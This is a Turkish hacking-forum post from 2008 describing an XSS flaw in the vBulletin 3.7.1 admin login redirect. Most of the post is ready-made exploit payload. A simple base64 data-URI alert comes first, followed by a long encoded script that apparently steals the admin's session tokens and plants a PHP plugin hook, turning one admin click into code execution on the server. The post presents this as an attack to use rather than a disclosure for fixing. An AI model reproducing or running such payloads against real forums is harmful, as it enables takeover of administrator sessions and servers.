Aktif Konular Son 50 Konu
Aktif Kullanıcılar Aktif Kullanıcılar
Aktif Konular Aktif Konular
Forum Üyelerini Göster Forum Üyelerini Göster
Forumu Ara Forumu Ara
Yardım Yardım

Giriş Giriş Yap
Forum Ana Sayfaya Git Forum
Download modülü Download modülü
Hızlı Erişim Menü Kişisel
Görevliler: Administrator,
TurkeyForum.info
      Kilitli ForumGÜVENLİK
            Kilitli ForumWEB GÜVENLİK
                 Mesaj icon Konu Başlığı: Vbulletin 3.7.1 xss açığı
Yanıt YazYeni Konu Gönder Giriş
blackhaCkEr Menü Göster
Banned
Simge

Üye no: 2283
24.Temmuz.2006
Mesaj: 75

Aktiflik
25%
Banned
Ban Mesajı !

Alıntı blackhaCkEr Cevapla Konu: Vbulletin 3.7.1 xss açığı  Zaman: 17.Haziran.2008 Saat 12:29  Paylaş
    Font Boyut:

Vbulletin 3.7.1 xss açığı


İlk olarak açığın tam yerine bakalım. XSS sorgusu Admin giriş sayfasında var olmakta.Giriş scripti başka bir tarafa yönlendirme parametresi atıyor ve uyumsuz bir şekilde basit bir XSS ye izin veriyor.

http://Host/vB3/admincp/index.php?redirect=XSS}

Yalnız burada ilk görünen şey açık bir belirsizlilğe gidiyor. Ne yapmak gerekli ki açık tam olarak çalışsın. Burada yapılması gereken Base64 encode dataları şifreleme ile açığı kullanmak. Bu şekilde istek ve aktivite admin login iken ayakta kalır.


Basit bir örnek:

http:/Host/vB3/admincp/index.php?redirect=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K


Şüphesiz Jelsoft şu zamana kadar bu tarz bir XSS sömürüsü görmemiştir. Bu durumda limitsiz ve değiştirilmez bir XSS alanına sahipsiniz ve biraz Ajax ile eğlenebilirsiniz.Fikir vermek gerekirse bunu nasıl daha büyük bir şeye çevirebiliriz. bulletin in bazı tuzakları vardır eval() in kullanımıyla ilgili. ve yeni tuzaklar eklenebilir ACP ile. JS kod yazmak sadece tuzağı etkin hale getirmez ayrıca güzel bir RFI hilesi içerir.
Aşağıda örnek bir data URI kullanımı:


data:text/html;base64,PHNjcmlwdD5ldmFsKCJ1PSdhcHBsaWNhdGlvbi94LXd3dy1mb3
JtLXVybGVuY29kZWQnO2M9J0NvbnRlbnQtdHlwZSc7ZD0nQ29udGVudC1sZW5ndGgnO3JlZz
0gbmV3IFhNTEh0dHBSZXF1ZXN0KCk7cmVnLm9wZW4oJ0dFVCcsICdodHRwOi8vbG9jYWxob3
N0L3ZCL3VwbG9hZC9hZG1pbmNwL3BsdWdpbi5waHA/ZG89YWRkJywgZmFsc2UpO3JlZy5zZW
5kKG51bGwpO3IgPSByZWcucmVzcG9uc2VUZXh0O3Q9J2h0dHA6Ly9sb2NhbGhvc3QvdkIvdX
Bsb2FkL2FkbWluY3AvcGx1Z2luLnBocCc7aD0nJmFkbWluaGFzaD0nK3Iuc3Vic3RyKHIuaW
5kZXhPZignaGFzaFwiJykrMTMsMzIpO3RvPScmc2VjdXJpdHl0b2tlbj0nK3Iuc3Vic3RyKH
IuaW5kZXhPZigndG9rZW5cIicpKzE0LDQwKTt0Mj0ncHJvZHVjdD12YnVsbGV0aW4maG9va2
5hbWU9Zm9ydW1ob21lX3N0YXJ0JmRvPXVwZGF0ZSZ0aXRsZT1mb28mZXhlY3V0aW9ub3JkZX
I9MSZwaHBjb2RlPXBocGluZm8oKTsmYWN0aXZlPTEnK2grdG87cjIgPSBuZXcgWE1MSHR0cF
JlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJywgdCwgZmFsc2UpO3IyLnNldFJlcXVlc3RIZWFkZX
IoZCwgdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7dD
0naHR0cDovL2xvY2FsaG9zdC92Qi91cGxvYWQvYWRtaW5jcC9vcHRpb25zLnBocCc7dDI9J2
RvPWRvb3B0aW9ucyZzZXR0aW5nW2VuYWJsZWhvb2tzXT0xJytoK3RvO3IyPSBuZXcgWE1MSH
R0cFJlcXVlc3QoKTtyMi5vcGVuKCdQT1NUJyx0LGZhbHNlKTtyMi5zZXRSZXF1ZXN0SGVhZG
VyKGQsdDIubGVuZ3RoKTtyMi5zZXRSZXF1ZXN0SGVhZGVyKGMsdSk7cjIuc2VuZCh0Mik7Ii
k8L3NjcmlwdD4K

Açığı sömürmek için yapılıcak tek şey admine tek bir kez tıklatmak.



Kaynak:
IP
 Cevapla  

Etiketler: Vbulletin 3.7.1 xss açığı, 
       
  iCare Data Recovery Software v3.7.1  sniper  Antivirüs - Güvenlik Araçları  23.06.2010 17:53:06
  vBulletin v3.8.3 Null  REaliST  Scriptler (web tasarım)  23.06.2009 10:17:27
  vbulletin açıklarını kapatma  By_P!sSToN  WEB GÜVENLİK  21.06.2009 00:39:14
  Vbulletin 3.8.0 Dil Paketi  REaliST  Scriptler (web tasarım)  01.06.2009 19:14:14
  VBulletin Süper Paket  REaliST  Scriptler (web tasarım)  24.05.2009 14:22:14
  Msn 8.0 de güvenlik açığı  F@RUK  MAİL GÜVENLİK  27.04.2009 01:25:50
  vBulletin 3.7.3 null  REaliST  Scriptler (web tasarım)  14.04.2009 13:55:09
  VBulletin 3.8.0 Beta 1 + Türkçe Dil Paketi  REaliST  Scriptler (web tasarım)  25.02.2009 16:37:12
Yanıt Yaz Yeni Konu Gönder
Konuyu Yazdır Konuyu Yazdır

Forum Atla


   TurkeyForum.info - Paylaşmak Özgürlüktür